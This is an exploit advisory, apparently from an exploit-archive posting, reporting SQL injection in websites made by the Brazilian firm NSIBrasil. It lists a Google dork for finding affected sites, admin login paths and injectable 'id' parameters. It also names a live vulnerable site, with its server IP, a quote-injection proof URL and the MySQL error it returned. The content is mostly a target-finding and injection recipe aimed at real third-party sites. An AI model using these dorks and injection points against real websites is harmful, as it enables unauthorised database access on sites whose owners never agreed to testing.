########################################################
# Exploit Title : Desenvolvido por NSIBrasil Web Design SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/01/2019
# Vendor Homepage : nsibrasil.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por nsibrasil"
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
########################################################
# Admin Panel Login Path :
*************************
/stilo_gei/index.php
/sistema/
# SQL Injection Exploit :
***********************
/site_v2/ver_noticias.php?id=[SQL Injection]
/ver_noticias.php?id=[SQL Injection]
########################################################
# Example Vulnerable Site :
*************************
Note : (192.185.218.119) => There are 114 domains hosted on this server.
[+] monteirosouza.com.br/site_v2/ver_noticias.php?id=8%27 =>
[ Proof of Concept ] => archive.fo/tGWQV
########################################################
# SQL Database Error :
**********************
Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
syntax to use near ''8''' at line 1
########################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
########################################################